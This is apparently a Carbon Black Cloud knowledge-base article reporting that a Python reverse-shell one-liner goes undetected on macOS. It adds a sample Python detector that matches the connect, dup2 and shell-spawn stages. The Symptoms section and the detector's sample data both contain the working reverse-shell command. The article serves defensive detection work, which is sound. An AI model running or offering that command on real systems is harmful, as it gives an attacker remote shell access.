Environment
- CBC sensor: All versions
- CBC Console: All versions
- Apple MacOS: All versions
Symptoms
Run this command (generated by Google's reverse shell generator at https://revshells.com/):
python -c 'import sys, socket,os,pty;s=socket.socket();s.connect(("10.1.2.3",8443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("sh")'
- Find the network connection (netconn) on the Investigate page with the search: netconn_ipv4:10.1.2.3
- Note that no "reverse_shell" TTP is attached to the process and no alert fires (filter on TTP "reverse_shell" to confirm)
Cause
This is a known limitation, tracked internally as DETECT-2649.
Resolution
DETECT-2649, which concerns this particular class of reverse shell (shell code wrapped in a Python interpreter invocation), will be addressed in a future rule iteration.
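Until that rule update ships, a compensating detection can key on the three stages the one-liner above performs in a single interpreter command line: an outbound connect, dup2 of fds 0/1/2 onto the socket, and a shell spawn. The following is an added example written for this article, not Carbon Black's own rule logic or event schema; the ProcessEvent fields and the sample events are assumptions constructed for illustration.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal stand-in for a process-start record (assumed fields, not the CBC schema)."""
    process_name: str
    cmdline: str
    remote_ip: Optional[str] = None  # destination of a netconn attributed to the process


# One regex group per stage of the pattern described in the article. Flagging only
# when every stage is present keeps ordinary socket-using scripts out of the queue.
STAGES = {
    "connect": [r"\.connect\(", r"create_connection\("],
    "redirect": [r"dup2\("],
    "shell": [r"pty\.spawn\(", r"os\.system\(", r"subprocess\.\w+\(", r"os\.exec\w*\("],
}


def is_python_interpreter(process_name: str) -> bool:
    """True for python, python2, python3, python3.x binaries regardless of path."""
    return os.path.basename(process_name).lower().startswith("python")


def classify(event: ProcessEvent) -> Tuple[bool, List[str]]:
    """Return (flag, matched stage names); flag is True only when all stages matched."""
    if not is_python_interpreter(event.process_name):
        return False, []
    matched = [stage for stage, patterns in STAGES.items()
               if any(re.search(p, event.cmdline) for p in patterns)]
    return len(matched) == len(STAGES), matched


# Constructed sample events: the command from this article, a benign socket client
# that only connects, and a non-interpreter process with the same destination.
SAMPLE_EVENTS = [
    ProcessEvent("/usr/bin/python", "python -c 'import sys, socket,os,pty;s=socket.socket();"
                 "s.connect((\"10.1.2.3\",8443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];"
                 "pty.spawn(\"sh\")'", remote_ip="10.1.2.3"),
    ProcessEvent("/usr/bin/python3", "python3 -c \"import socket; s=socket.socket(); "
                 "s.connect(('10.1.2.3', 443)); print(s.recv(16))\"", remote_ip="10.1.2.3"),
    ProcessEvent("/usr/bin/curl", "curl https://example.invalid/", remote_ip="10.1.2.3"),
]


def triage(events: List[ProcessEvent]) -> List[dict]:
    """One triage row per event: which stages hit, the netconn peer, and the verdict."""
    rows = []
    for ev in events:
        flag, stages = classify(ev)
        rows.append({"process": ev.process_name, "remote_ip": ev.remote_ip,
                     "stages": stages, "flag": flag})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Only the first sample is flagged; the benign client matches the "connect" stage alone, which is the case the stage-and logic is there to suppress.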